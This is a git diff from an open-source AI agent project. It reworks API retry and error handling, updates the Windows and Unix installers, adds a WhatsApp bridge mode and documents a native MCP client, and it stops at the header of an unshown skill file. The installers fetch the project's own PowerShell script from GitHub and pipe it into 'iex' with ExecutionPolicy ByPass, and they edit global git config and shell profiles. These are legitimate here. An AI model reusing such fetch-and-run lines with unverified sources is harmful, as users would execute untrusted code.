+                        break  # Cannot compress further
+                    # Re-estimate after compression
+                    _sys_tok_est = estimate_tokens_rough(active_system_prompt or "")
+                    _msg_tok_est = estimate_messages_tokens_rough(messages)
+                    _preflight_tokens = _sys_tok_est + _msg_tok_est
+                    if _preflight_tokens < self.context_compressor.threshold_tokens:
+                        break  # Under threshold
+
        # Main conversation loop
        api_call_count = 0
        final_response = None
@@ -3067,7 +3122,7 @@ class AIAgent:
                        print(f"{self.log_prefix}   📝 Provider message: {error_msg[:200]}")
                        print(f"{self.log_prefix}   ⏱️  Response time: {api_duration:.2f}s (fast response often indicates rate limiting)")
                        
-                        if retry_count > max_retries:
+                        if retry_count >= max_retries:
                            print(f"{self.log_prefix}❌ Max retries ({max_retries}) exceeded for invalid responses. Giving up.")
                            logging.error(f"{self.log_prefix}Invalid API response after {max_retries} retries.")
                            self._persist_session(messages, conversation_history)
@@ -3277,37 +3332,10 @@ class AIAgent:
                                "partial": True
                            }

-                    # Check for non-retryable client errors (4xx HTTP status codes).
-                    # These indicate a problem with the request itself (bad model ID,
-                    # invalid API key, forbidden, etc.) and will never succeed on retry.
-                    # Note: 413 is excluded — it's handled above via compression.
-                    is_client_status_error = isinstance(status_code, int) and 400 <= status_code < 500 and status_code != 413
-                    is_client_error = is_client_status_error or any(phrase in error_msg for phrase in [
-                        'error code: 400', 'error code: 401', 'error code: 403',
-                        'error code: 404', 'error code: 422',
-                        'is not a valid model', 'invalid model', 'model not found',
-                        'invalid api key', 'invalid_api_key', 'authentication',
-                        'unauthorized', 'forbidden', 'not found',
-                    ])
-
-                    if is_client_error:
-                        self._dump_api_request_debug(
-                            api_kwargs, reason="non_retryable_client_error", error=api_error,
-                        )
-                        print(f"{self.log_prefix}❌ Non-retryable client error detected. Aborting immediately.")
-                        print(f"{self.log_prefix}   💡 This type of error won't be fixed by retrying.")
-                        logging.error(f"{self.log_prefix}Non-retryable client error: {api_error}")
-                        self._persist_session(messages, conversation_history)
-                        return {
-                            "final_response": None,
-                            "messages": messages,
-                            "api_calls": api_call_count,
-                            "completed": False,
-                            "failed": True,
-                            "error": str(api_error),
-                        }
-                    
-                    # Check for non-retryable errors (context length exceeded)
+                    # Check for context-length errors BEFORE generic 4xx handler.
+                    # OpenRouter returns 400 (not 413) for "maximum context length"
+                    # errors — if we let the generic 4xx handler catch those first,
+                    # it aborts immediately instead of attempting compression+retry.
                    is_context_length_error = any(phrase in error_msg for phrase in [
                        'context length', 'maximum context', 'token limit',
                        'too many tokens', 'reduce the length', 'exceeds the limit',
@@ -3338,8 +3366,39 @@ class AIAgent:
                                "error": f"Context length exceeded ({approx_tokens:,} tokens). Cannot compress further.",
                                "partial": True
                            }
+
+                    # Check for non-retryable client errors (4xx HTTP status codes).
+                    # These indicate a problem with the request itself (bad model ID,
+                    # invalid API key, forbidden, etc.) and will never succeed on retry.
+                    # Note: 413 and context-length errors are excluded — handled above
+                    # via compression.
+                    is_client_status_error = isinstance(status_code, int) and 400 <= status_code < 500 and status_code != 413
+                    is_client_error = (is_client_status_error or any(phrase in error_msg for phrase in [
+                        'error code: 400', 'error code: 401', 'error code: 403',
+                        'error code: 404', 'error code: 422',
+                        'is not a valid model', 'invalid model', 'model not found',
+                        'invalid api key', 'invalid_api_key', 'authentication',
+                        'unauthorized', 'forbidden', 'not found',
+                    ])) and not is_context_length_error
+
+                    if is_client_error:
+                        self._dump_api_request_debug(
+                            api_kwargs, reason="non_retryable_client_error", error=api_error,
+                        )
+                        print(f"{self.log_prefix}❌ Non-retryable client error detected. Aborting immediately.")
+                        print(f"{self.log_prefix}   💡 This type of error won't be fixed by retrying.")
+                        logging.error(f"{self.log_prefix}Non-retryable client error: {api_error}")
+                        self._persist_session(messages, conversation_history)
+                        return {
+                            "final_response": None,
+                            "messages": messages,
+                            "api_calls": api_call_count,
+                            "completed": False,
+                            "failed": True,
+                            "error": str(api_error),
+                        }
                    
-                    if retry_count > max_retries:
+                    if retry_count >= max_retries:
                        print(f"{self.log_prefix}❌ Max retries ({max_retries}) exceeded. Giving up.")
                        logging.error(f"{self.log_prefix}API call failed after {max_retries} retries. Last error: {api_error}")
                        logging.error(f"{self.log_prefix}Request details - Messages: {len(api_messages)}, Approx tokens: {approx_tokens:,}")
--- a/scripts/install.cmd
+++ b/scripts/install.cmd
@@ -0,0 +1,28 @@
+@echo off
+REM ============================================================================
+REM Hermes Agent Installer for Windows (CMD wrapper)
+REM ============================================================================
+REM This batch file launches the PowerShell installer for users running CMD.
+REM
+REM Usage:
+REM   curl -fsSL https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.cmd -o install.cmd && install.cmd && del install.cmd
+REM
+REM Or if you're already in PowerShell, use the direct command instead:
+REM   irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex
+REM ============================================================================
+
+echo.
+echo  Hermes Agent Installer
+echo  Launching PowerShell installer...
+echo.
+
+powershell -ExecutionPolicy ByPass -NoProfile -Command "irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex"
+
+if %ERRORLEVEL% NEQ 0 (
+    echo.
+    echo  Installation failed. Please try running PowerShell directly:
+    echo    powershell -ExecutionPolicy ByPass -c "irm https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1 | iex"
+    echo.
+    pause
+    exit /b 1
+)
--- a/scripts/install.ps1
+++ b/scripts/install.ps1
@@ -16,8 +16,8 @@ param(
    [switch]$NoVenv,
    [switch]$SkipSetup,
    [string]$Branch = "main",
-    [string]$HermesHome = "$env:USERPROFILE\.hermes",
-    [string]$InstallDir = "$env:USERPROFILE\.hermes\hermes-agent"
+    [string]$HermesHome = "$env:LOCALAPPDATA\hermes",
+    [string]$InstallDir = "$env:LOCALAPPDATA\hermes\hermes-agent"
 )

 $ErrorActionPreference = "Stop"
@@ -145,17 +145,49 @@ function Test-Python {
    # Python not found — use uv to install it (no admin needed!)
    Write-Info "Python $PythonVersion not found, installing via uv..."
    try {
-        & $UvCmd python install $PythonVersion 2>&1 | Out-Null
-        $pythonPath = & $UvCmd python find $PythonVersion 2>$null
-        if ($pythonPath) {
-            $ver = & $pythonPath --version 2>$null
-            Write-Success "Python installed: $ver"
+        $uvOutput = & $UvCmd python install $PythonVersion 2>&1
+        if ($LASTEXITCODE -eq 0) {
+            $pythonPath = & $UvCmd python find $PythonVersion 2>$null
+            if ($pythonPath) {
+                $ver = & $pythonPath --version 2>$null
+                Write-Success "Python installed: $ver"
+                return $true
+            }
+        } else {
+            Write-Warn "uv python install output:"
+            Write-Host $uvOutput -ForegroundColor DarkGray
+        }
+    } catch {
+        Write-Warn "uv python install error: $_"
+    }
+
+    # Fallback: check if ANY Python 3.10+ is already available on the system
+    Write-Info "Trying to find any existing Python 3.10+..."
+    foreach ($fallbackVer in @("3.12", "3.13", "3.10")) {
+        try {
+            $pythonPath = & $UvCmd python find $fallbackVer 2>$null
+            if ($pythonPath) {
+                $ver = & $pythonPath --version 2>$null
+                Write-Success "Found fallback: $ver"
+                $script:PythonVersion = $fallbackVer
+                return $true
+            }
+        } catch { }
+    }
+
+    # Fallback: try system python
+    if (Get-Command python -ErrorAction SilentlyContinue) {
+        $sysVer = python --version 2>$null
+        if ($sysVer -match "3\.(1[0-9]|[1-9][0-9])") {
+            Write-Success "Using system Python: $sysVer"
            return $true
        }
-    } catch { }
+    }
    
    Write-Err "Failed to install Python $PythonVersion"
-    Write-Info "Install Python $PythonVersion manually, then re-run this script"
+    Write-Info "Install Python 3.11 manually, then re-run this script:"
+    Write-Info "  https://www.python.org/downloads/"
+    Write-Info "  Or: winget install Python.Python.3.11"
    return $false
 }

@@ -384,48 +416,103 @@ function Install-Repository {
        if (Test-Path "$InstallDir\.git") {
            Write-Info "Existing installation found, updating..."
            Push-Location $InstallDir
-            git fetch origin
-            git checkout $Branch
-            git pull origin $Branch
+            git -c windows.appendAtomically=false fetch origin
+            git -c windows.appendAtomically=false checkout $Branch
+            git -c windows.appendAtomically=false pull origin $Branch
            Pop-Location
        } else {
            Write-Err "Directory exists but is not a git repository: $InstallDir"
            Write-Info "Remove it or choose a different directory with -InstallDir"
-            exit 1
+            throw "Directory exists but is not a git repository: $InstallDir"
        }
    } else {
-        # Try SSH first (for private repo access), fall back to HTTPS.
-        # GIT_SSH_COMMAND with BatchMode=yes prevents SSH from hanging
-        # when no key is configured (fails immediately instead of prompting).
+        $cloneSuccess = $false
+
+        # Fix Windows git "copy-fd: write returned: Invalid argument" error.
+        # Git for Windows can fail on atomic file operations (hook templates,
+        # config lock files) due to antivirus, OneDrive, or NTFS filter drivers.
+        # The -c flag injects config before any file I/O occurs.
+        Write-Info "Configuring git for Windows compatibility..."
+        $env:GIT_CONFIG_COUNT = "1"
+        $env:GIT_CONFIG_KEY_0 = "windows.appendAtomically"
+        $env:GIT_CONFIG_VALUE_0 = "false"
+        git config --global windows.appendAtomically false 2>$null
+
+        # Try SSH first, then HTTPS, with -c flag for atomic write fix
        Write-Info "Trying SSH clone..."
        $env:GIT_SSH_COMMAND = "ssh -o BatchMode=yes -o ConnectTimeout=5"
-        $sshResult = git clone --branch $Branch --recurse-submodules $RepoUrlSsh $InstallDir 2>&1
-        $sshExitCode = $LASTEXITCODE
+        try {
+            git -c windows.appendAtomically=false clone --branch $Branch --recurse-submodules $RepoUrlSsh $InstallDir
+            if ($LASTEXITCODE -eq 0) { $cloneSuccess = $true }
+        } catch { }
        $env:GIT_SSH_COMMAND = $null
        
-        if ($sshExitCode -eq 0) {
-            Write-Success "Cloned via SSH"
-        } else {
-            # Clean up partial SSH clone before retrying
+        if (-not $cloneSuccess) {
            if (Test-Path $InstallDir) { Remove-Item -Recurse -Force $InstallDir -ErrorAction SilentlyContinue }
            Write-Info "SSH failed, trying HTTPS..."
-            $httpsResult = git clone --branch $Branch --recurse-submodules $RepoUrlHttps $InstallDir 2>&1
-            
-            if ($LASTEXITCODE -eq 0) {
-                Write-Success "Cloned via HTTPS"
-            } else {
-                Write-Err "Failed to clone repository"
-                exit 1
+            try {
+                git -c windows.appendAtomically=false clone --branch $Branch --recurse-submodules $RepoUrlHttps $InstallDir
+                if ($LASTEXITCODE -eq 0) { $cloneSuccess = $true }
+            } catch { }
+        }
+
+        # Fallback: download ZIP archive (bypasses git file I/O issues entirely)
+        if (-not $cloneSuccess) {
+            if (Test-Path $InstallDir) { Remove-Item -Recurse -Force $InstallDir -ErrorAction SilentlyContinue }
+            Write-Warn "Git clone failed — downloading ZIP archive instead..."
+            try {
+                $zipUrl = "https://github.com/NousResearch/hermes-agent/archive/refs/heads/$Branch.zip"
+                $zipPath = "$env:TEMP\hermes-agent-$Branch.zip"
+                $extractPath = "$env:TEMP\hermes-agent-extract"
+                
+                Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath -UseBasicParsing
+                if (Test-Path $extractPath) { Remove-Item -Recurse -Force $extractPath }
+                Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force
+                
+                # GitHub ZIPs extract to repo-branch/ subdirectory
+                $extractedDir = Get-ChildItem $extractPath -Directory | Select-Object -First 1
+                if ($extractedDir) {
+                    New-Item -ItemType Directory -Force -Path (Split-Path $InstallDir) -ErrorAction SilentlyContinue | Out-Null
+                    Move-Item $extractedDir.FullName $InstallDir -Force
+                    Write-Success "Downloaded and extracted"
+                    
+                    # Initialize git repo so updates work later
+                    Push-Location $InstallDir
+                    git -c windows.appendAtomically=false init 2>$null
+                    git -c windows.appendAtomically=false config windows.appendAtomically false 2>$null
+                    git remote add origin $RepoUrlHttps 2>$null
+                    Pop-Location
+                    Write-Success "Git repo initialized for future updates"
+                    
+                    $cloneSuccess = $true
+                }
+                
+                # Cleanup temp files
+                Remove-Item -Force $zipPath -ErrorAction SilentlyContinue
+                Remove-Item -Recurse -Force $extractPath -ErrorAction SilentlyContinue
+            } catch {
+                Write-Err "ZIP download also failed: $_"
            }
        }
+
+        if (-not $cloneSuccess) {
+            throw "Failed to download repository (tried git clone SSH, HTTPS, and ZIP)"
+        }
    }
    
+    # Set per-repo config (harmless if it fails)
+    Push-Location $InstallDir
+    git -c windows.appendAtomically=false config windows.appendAtomically false 2>$null
+
    # Ensure submodules are initialized and updated
    Write-Info "Initializing submodules (mini-swe-agent, tinker-atropos)..."
-    Push-Location $InstallDir
-    git submodule update --init --recursive
+    git -c windows.appendAtomically=false submodule update --init --recursive 2>$null
+    if ($LASTEXITCODE -ne 0) {
+        Write-Warn "Submodule init failed (terminal/RL tools may need manual setup)"
+    } else {
+        Write-Success "Submodules ready"
+    }
    Pop-Location
-    Write-Success "Submodules ready"
    
    Write-Success "Repository ready"
 }
@@ -526,6 +613,16 @@ function Set-PathVariable {
        Write-Info "PATH already configured"
    }
    
+    # Set HERMES_HOME so the Python code finds config/data in the right place.
+    # Only needed on Windows where we install to %LOCALAPPDATA%\hermes instead
+    # of the Unix default ~/.hermes
+    $currentHermesHome = [Environment]::GetEnvironmentVariable("HERMES_HOME", "User")
+    if (-not $currentHermesHome -or $currentHermesHome -ne $HermesHome) {
+        [Environment]::SetEnvironmentVariable("HERMES_HOME", $HermesHome, "User")
+        Write-Success "Set HERMES_HOME=$HermesHome"
+    }
+    $env:HERMES_HOME = $HermesHome
+    
    # Update current session
    $env:Path = "$hermesBin;$env:Path"
    
@@ -744,7 +841,7 @@ function Write-Completion {
    Write-Host ""
    
    # Show file locations
-    Write-Host "📁 Your files (all in ~/.hermes/):" -ForegroundColor Cyan
+    Write-Host "📁 Your files:" -ForegroundColor Cyan
    Write-Host ""
    Write-Host "   Config:    " -NoNewline -ForegroundColor Yellow
    Write-Host "$HermesHome\config.yaml"
@@ -800,9 +897,9 @@ function Write-Completion {
 function Main {
    Write-Banner
    
-    if (-not (Install-Uv)) { exit 1 }
-    if (-not (Test-Python)) { exit 1 }
-    if (-not (Test-Git)) { exit 1 }
+    if (-not (Install-Uv)) { throw "uv installation failed — cannot continue" }
+    if (-not (Test-Python)) { throw "Python $PythonVersion not available — cannot continue" }
+    if (-not (Test-Git)) { throw "Git not found — install from https://git-scm.com/download/win" }
    Test-Node              # Auto-installs if missing
    Install-SystemPackages  # ripgrep + ffmpeg in one step
    
@@ -818,4 +915,17 @@ function Main {
    Write-Completion
 }

-Main
+# Wrap in try/catch so errors don't kill the terminal when run via:
+#   irm https://...install.ps1 | iex
+# (exit/throw inside iex kills the entire PowerShell session)
+try {
+    Main
+} catch {
+    Write-Host ""
+    Write-Err "Installation failed: $_"
+    Write-Host ""
+    Write-Info "If the error is unclear, try downloading and running the script directly:"
+    Write-Host "  Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/NousResearch/hermes-agent/main/scripts/install.ps1' -OutFile install.ps1" -ForegroundColor Yellow
+    Write-Host "  .\install.ps1" -ForegroundColor Yellow
+    Write-Host ""
+}
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -848,8 +848,11 @@ run_setup_wizard() {
        return 0
    fi

-    if [ "$IS_INTERACTIVE" = false ]; then
-        log_info "Setup wizard skipped (non-interactive). Run 'hermes setup' after install."
+    # The setup wizard reads from /dev/tty, so it works even when the
+    # install script itself is piped (curl | bash). Only skip if no
+    # terminal is available at all (e.g. Docker build, CI).
+    if ! [ -e /dev/tty ]; then
+        log_info "Setup wizard skipped (no terminal available). Run 'hermes setup' after install."
        return 0
    fi

@@ -913,8 +916,8 @@ maybe_start_gateway() {
        fi
    fi

-    if [ "$IS_INTERACTIVE" = false ]; then
-        log_info "Gateway setup skipped (non-interactive). Run 'hermes gateway install' later."
+    if ! [ -e /dev/tty ]; then
+        log_info "Gateway setup skipped (no terminal available). Run 'hermes gateway install' later."
        return 0
    fi

--- a/scripts/whatsapp-bridge/bridge.js
+++ b/scripts/whatsapp-bridge/bridge.js
@@ -34,6 +34,7 @@ function getArg(name, defaultVal) {
 const PORT = parseInt(getArg('port', '3000'), 10);
 const SESSION_DIR = getArg('session', path.join(process.env.HOME || '~', '.hermes', 'whatsapp', 'session'));
 const PAIR_ONLY = args.includes('--pair-only');
+const WHATSAPP_MODE = getArg('mode', process.env.WHATSAPP_MODE || 'self-chat'); // "bot" or "self-chat"
 const ALLOWED_USERS = (process.env.WHATSAPP_ALLOWED_USERS || '').split(',').map(s => s.trim()).filter(Boolean);

 mkdirSync(SESSION_DIR, { recursive: true });
@@ -110,11 +111,16 @@ async function startSocket() {
      const isGroup = chatId.endsWith('@g.us');
      const senderNumber = senderId.replace(/@.*/, '');

-      // Skip own messages UNLESS it's a self-chat ("Message Yourself")
+      // Handle fromMe messages based on mode
      if (msg.key.fromMe) {
-        // Always skip in groups and status
        if (isGroup || chatId.includes('status')) continue;
-        // In DMs: only allow self-chat (remoteJid matches our own number)
+
+        if (WHATSAPP_MODE === 'bot') {
+          // Bot mode: separate number. ALL fromMe are echo-backs of our own replies — skip.
+          continue;
+        }
+
+        // Self-chat mode: only allow messages in the user's own self-chat
        const myNumber = (sock.user?.id || '').replace(/:.*@/, '@').replace(/@.*/, '');
        const chatNumber = chatId.replace(/@.*/, '');
        const isSelfChat = myNumber && chatNumber === myNumber;
@@ -270,7 +276,7 @@ if (PAIR_ONLY) {
  startSocket();
 } else {
  app.listen(PORT, () => {
-    console.log(`🌉 WhatsApp bridge listening on port ${PORT}`);
+    console.log(`🌉 WhatsApp bridge listening on port ${PORT} (mode: ${WHATSAPP_MODE})`);
    console.log(`📁 Session stored in: ${SESSION_DIR}`);
    if (ALLOWED_USERS.length > 0) {
      console.log(`🔒 Allowed users: ${ALLOWED_USERS.join(', ')}`);
--- a/setup-hermes.sh
+++ b/setup-hermes.sh
@@ -215,17 +215,28 @@ mkdir -p "$HOME/.local/bin"
 ln -sf "$HERMES_BIN" "$HOME/.local/bin/hermes"
 echo -e "${GREEN}✓${NC} Symlinked hermes → ~/.local/bin/hermes"

-# Ensure ~/.local/bin is on PATH in shell config
+# Determine the appropriate shell config file
 SHELL_CONFIG=""
-if [ -f "$HOME/.zshrc" ]; then
+if [[ "$SHELL" == *"zsh"* ]]; then
    SHELL_CONFIG="$HOME/.zshrc"
-elif [ -f "$HOME/.bashrc" ]; then
+elif [[ "$SHELL" == *"bash"* ]]; then
    SHELL_CONFIG="$HOME/.bashrc"
-elif [ -f "$HOME/.bash_profile" ]; then
-    SHELL_CONFIG="$HOME/.bash_profile"
+    [ ! -f "$SHELL_CONFIG" ] && SHELL_CONFIG="$HOME/.bash_profile"
+else
+    # Fallback to checking existing files
+    if [ -f "$HOME/.zshrc" ]; then
+        SHELL_CONFIG="$HOME/.zshrc"
+    elif [ -f "$HOME/.bashrc" ]; then
+        SHELL_CONFIG="$HOME/.bashrc"
+    elif [ -f "$HOME/.bash_profile" ]; then
+        SHELL_CONFIG="$HOME/.bash_profile"
+    fi
 fi

 if [ -n "$SHELL_CONFIG" ]; then
+    # Touch the file just in case it doesn't exist yet but was selected
+    touch "$SHELL_CONFIG" 2>/dev/null || true
+    
    if ! echo "$PATH" | tr ':' '\n' | grep -q "^$HOME/.local/bin$"; then
        if ! grep -q '\.local/bin' "$SHELL_CONFIG" 2>/dev/null; then
            echo "" >> "$SHELL_CONFIG"
--- a/skills/mcp/DESCRIPTION.md
+++ b/skills/mcp/DESCRIPTION.md
@@ -1,3 +1,3 @@
 ---
-description: Skills for working with MCP (Model Context Protocol) servers, tools, and integrations.
+description: Skills for working with MCP (Model Context Protocol) servers, tools, and integrations. Includes the built-in native MCP client (configure servers in config.yaml for automatic tool discovery) and the mcporter CLI bridge for ad-hoc server interaction.
 ---
--- a/skills/mcp/native-mcp/SKILL.md
+++ b/skills/mcp/native-mcp/SKILL.md
@@ -0,0 +1,330 @@
+---
+name: native-mcp
+description: Built-in MCP (Model Context Protocol) client that connects to external MCP servers, discovers their tools, and registers them as native Hermes Agent tools. Supports stdio and HTTP transports with automatic reconnection, security filtering, and zero-config tool injection.
+version: 1.0.0
+author: Hermes Agent
+license: MIT
+metadata:
+  hermes:
+    tags: [MCP, Tools, Integrations]
+    related_skills: [mcporter]
+---
+
+# Native MCP Client
+
+Hermes Agent has a built-in MCP client that connects to MCP servers at startup, discovers their tools, and makes them available as first-class tools the agent can call directly. No bridge CLI needed -- tools from MCP servers appear alongside built-in tools like `terminal`, `read_file`, etc.
+
+## When to Use
+
+Use this whenever you want to:
+- Connect to MCP servers and use their tools from within Hermes Agent
+- Add external capabilities (filesystem access, GitHub, databases, APIs) via MCP
+- Run local stdio-based MCP servers (npx, uvx, or any command)
+- Connect to remote HTTP/StreamableHTTP MCP servers
+- Have MCP tools auto-discovered and available in every conversation
+
+For ad-hoc, one-off MCP tool calls from the terminal without configuring anything, see the `mcporter` skill instead.
+
+## Prerequisites
+
+- **mcp Python package** -- optional dependency; install with `pip install mcp`. If not installed, MCP support is silently disabled.
+- **Node.js** -- required for `npx`-based MCP servers (most community servers)
+- **uv** -- required for `uvx`-based MCP servers (Python-based servers)
+
+Install the MCP SDK:
+
+```bash
+pip install mcp
+# or, if using uv:
+uv pip install mcp
+```
+
+## Quick Start
+
+Add MCP servers to `~/.hermes/config.yaml` under the `mcp_servers` key:
+
+```yaml
+mcp_servers:
+  time:
+    command: "uvx"
+    args: ["mcp-server-time"]
+```
+
+Restart Hermes Agent. On startup it will:
+1. Connect to the server
+2. Discover available tools
+3. Register them with the prefix `mcp_time_*`
+4. Inject them into all platform toolsets
+
+You can then use the tools naturally -- just ask the agent to get the current time.
+
+## Configuration Reference
+
+Each entry under `mcp_servers` is a server name mapped to its config. There are two transport types: **stdio** (command-based) and **HTTP** (url-based).
+
+### Stdio Transport (command + args)
+
+```yaml
+mcp_servers:
+  server_name:
+    command: "npx"             # (required) executable to run
+    args: ["-y", "pkg-name"]   # (optional) command arguments, default: []
+    env:                       # (optional) environment variables for the subprocess
+      SOME_API_KEY: "value"
+    timeout: 120               # (optional) per-tool-call timeout in seconds, default: 120
+    connect_timeout: 60        # (optional) initial connection timeout in seconds, default: 60
+```
+
+### HTTP Transport (url)
+
+```yaml
+mcp_servers:
+  server_name:
+    url: "https://my-server.example.com/mcp"   # (required) server URL
+    headers:                                     # (optional) HTTP headers
+      Authorization: "Bearer sk-..."
+    timeout: 180               # (optional) per-tool-call timeout in seconds, default: 120
+    connect_timeout: 60        # (optional) initial connection timeout in seconds, default: 60
+```
+
+### All Config Options
+
+| Option            | Type   | Default | Description                                       |
+|-------------------|--------|---------|---------------------------------------------------|
+| `command`         | string | --      | Executable to run (stdio transport, required)     |
+| `args`            | list   | `[]`    | Arguments passed to the command                   |
+| `env`             | dict   | `{}`    | Extra environment variables for the subprocess    |
+| `url`             | string | --      | Server URL (HTTP transport, required)             |
+| `headers`         | dict   | `{}`    | HTTP headers sent with every request              |
+| `timeout`         | int    | `120`   | Per-tool-call timeout in seconds                  |
+| `connect_timeout` | int    | `60`    | Timeout for initial connection and discovery      |
+
+Note: A server config must have either `command` (stdio) or `url` (HTTP), not both.
+
+## How It Works
+
+### Startup Discovery
+
+When Hermes Agent starts, `discover_mcp_tools()` is called during tool initialization:
+
+1. Reads `mcp_servers` from `~/.hermes/config.yaml`
+2. For each server, spawns a connection in a dedicated background event loop
+3. Initializes the MCP session and calls `list_tools()` to discover available tools
+4. Registers each tool in the Hermes tool registry
+
+### Tool Naming Convention
+
+MCP tools are registered with the naming pattern:
+
+```
+mcp_{server_name}_{tool_name}
+```
+
+Hyphens and dots in names are replaced with underscores for LLM API compatibility.
+
+Examples:
+- Server `filesystem`, tool `read_file` → `mcp_filesystem_read_file`
+- Server `github`, tool `list-issues` → `mcp_github_list_issues`
+- Server `my-api`, tool `fetch.data` → `mcp_my_api_fetch_data`
+
+### Auto-Injection
+
+After discovery, MCP tools are automatically injected into all `hermes-*` platform toolsets (CLI, Discord, Telegram, etc.). This means MCP tools are available in every conversation without any additional configuration.
+
+### Connection Lifecycle
+
+- Each server runs as a long-lived asyncio Task in a background daemon thread
+- Connections persist for the lifetime of the agent process
+- If a connection drops, automatic reconnection with exponential backoff kicks in (up to 5 retries, max 60s backoff)
+- On agent shutdown, all connections are gracefully closed
+
+### Idempotency
+
+`discover_mcp_tools()` is idempotent -- calling it multiple times only connects to servers that aren't already connected. Failed servers are retried on subsequent calls.
+
+## Transport Types
+
+### Stdio Transport
+
+The most common transport. Hermes launches the MCP server as a subprocess and communicates over stdin/stdout.
+
+```yaml
+mcp_servers:
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user/projects"]
+```
+
+The subprocess inherits a **filtered** environment (see Security section below) plus any variables you specify in `env`.
+
+### HTTP / StreamableHTTP Transport
+
+For remote or shared MCP servers. Requires the `mcp` package to include HTTP client support (`mcp.client.streamable_http`).
+
+```yaml
+mcp_servers:
+  remote_api:
+    url: "https://mcp.example.com/mcp"
+    headers:
+      Authorization: "Bearer sk-..."
+```
+
+If HTTP support is not available in your installed `mcp` version, the server will fail with an ImportError and other servers will continue normally.
+
+## Security
+
+### Environment Variable Filtering
+
+For stdio servers, Hermes does NOT pass your full shell environment to MCP subprocesses. Only safe baseline variables are inherited:
+
+- `PATH`, `HOME`, `USER`, `LANG`, `LC_ALL`, `TERM`, `SHELL`, `TMPDIR`
+- Any `XDG_*` variables
+
+All other environment variables (API keys, tokens, secrets) are excluded unless you explicitly add them via the `env` config key. This prevents accidental credential leakage to untrusted MCP servers.
+
+```yaml
+mcp_servers:
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      # Only this token is passed to the subprocess
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_..."
+```
+
+### Credential Stripping in Error Messages
+
+If an MCP tool call fails, any credential-like patterns in the error message are automatically redacted before being shown to the LLM. This covers:
+
+- GitHub PATs (`ghp_...`)
+- OpenAI-style keys (`sk-...`)
+- Bearer tokens
+- Generic `token=`, `key=`, `API_KEY=`, `password=`, `secret=` patterns
+
+## Troubleshooting
+
+### "MCP SDK not available -- skipping MCP tool discovery"
+
+The `mcp` Python package is not installed. Install it:
+
+```bash
+pip install mcp
+```
+
+### "No MCP servers configured"
+
+No `mcp_servers` key in `~/.hermes/config.yaml`, or it's empty. Add at least one server.
+
+### "Failed to connect to MCP server 'X'"
+
+Common causes:
+- **Command not found**: The `command` binary isn't on PATH. Ensure `npx`, `uvx`, or the relevant command is installed.
+- **Package not found**: For npx servers, the npm package may not exist or may need `-y` in args to auto-install.
+- **Timeout**: The server took too long to start. Increase `connect_timeout`.
+- **Port conflict**: For HTTP servers, the URL may be unreachable.
+
+### "MCP server 'X' requires HTTP transport but mcp.client.streamable_http is not available"
+
+Your `mcp` package version doesn't include HTTP client support. Upgrade:
+
+```bash
+pip install --upgrade mcp
+```
+
+### Tools not appearing
+
+- Check that the server is listed under `mcp_servers` (not `mcp` or `servers`)
+- Ensure the YAML indentation is correct
+- Look at Hermes Agent startup logs for connection messages
+- Tool names are prefixed with `mcp_{server}_{tool}` -- look for that pattern
+
+### Connection keeps dropping
+
+The client retries up to 5 times with exponential backoff (1s, 2s, 4s, 8s, 16s, capped at 60s). If the server is fundamentally unreachable, it gives up after 5 attempts. Check the server process and network connectivity.
+
+## Examples
+
+### Time Server (uvx)
+
+```yaml
+mcp_servers:
+  time:
+    command: "uvx"
+    args: ["mcp-server-time"]
+```
+
+Registers tools like `mcp_time_get_current_time`.
+
+### Filesystem Server (npx)
+
+```yaml
+mcp_servers:
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user/documents"]
+    timeout: 30
+```
+
+Registers tools like `mcp_filesystem_read_file`, `mcp_filesystem_write_file`, `mcp_filesystem_list_directory`.
+
+### GitHub Server with Authentication
+
+```yaml
+mcp_servers:
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxxxxxxxxxx"
+    timeout: 60
+```
+
+Registers tools like `mcp_github_list_issues`, `mcp_github_create_pull_request`, etc.
+
+### Remote HTTP Server
+
+```yaml
+mcp_servers:
+  company_api:
+    url: "https://mcp.mycompany.com/v1/mcp"
+    headers:
+      Authorization: "Bearer sk-xxxxxxxxxxxxxxxxxxxx"
+      X-Team-Id: "engineering"
+    timeout: 180
+    connect_timeout: 30
+```
+
+### Multiple Servers
+
+```yaml
+mcp_servers:
+  time:
+    command: "uvx"
+    args: ["mcp-server-time"]
+
+  filesystem:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-filesystem", "/tmp"]
+
+  github:
+    command: "npx"
+    args: ["-y", "@modelcontextprotocol/server-github"]
+    env:
+      GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_xxxxxxxxxxxxxxxxxxxx"
+
+  company_api:
+    url: "https://mcp.internal.company.com/mcp"
+    headers:
+      Authorization: "Bearer sk-xxxxxxxxxxxxxxxxxxxx"
+    timeout: 300
+```
+
+All tools from all servers are registered and available simultaneously. Each server's tools are prefixed with its name to avoid collisions.
+
+## Notes
+
+- MCP tools are called synchronously from the agent's perspective but run asynchronously on a dedicated background event loop
+- Tool results are returned as JSON with either `{"result": "..."}` or `{"error": "..."}`
+- The native MCP client is independent of `mcporter` -- you can use both simultaneously
+- Server connections are persistent and shared across all conversations in the same agent process
+- Adding or removing servers requires restarting the agent (no hot-reload currently)
--- a/skills/mlops/obliteratus/SKILL.md
+++ b/skills/mlops/obliteratus/SKILL.md
@@ -0,0 +1,314 @@
+---
+name: obliteratus
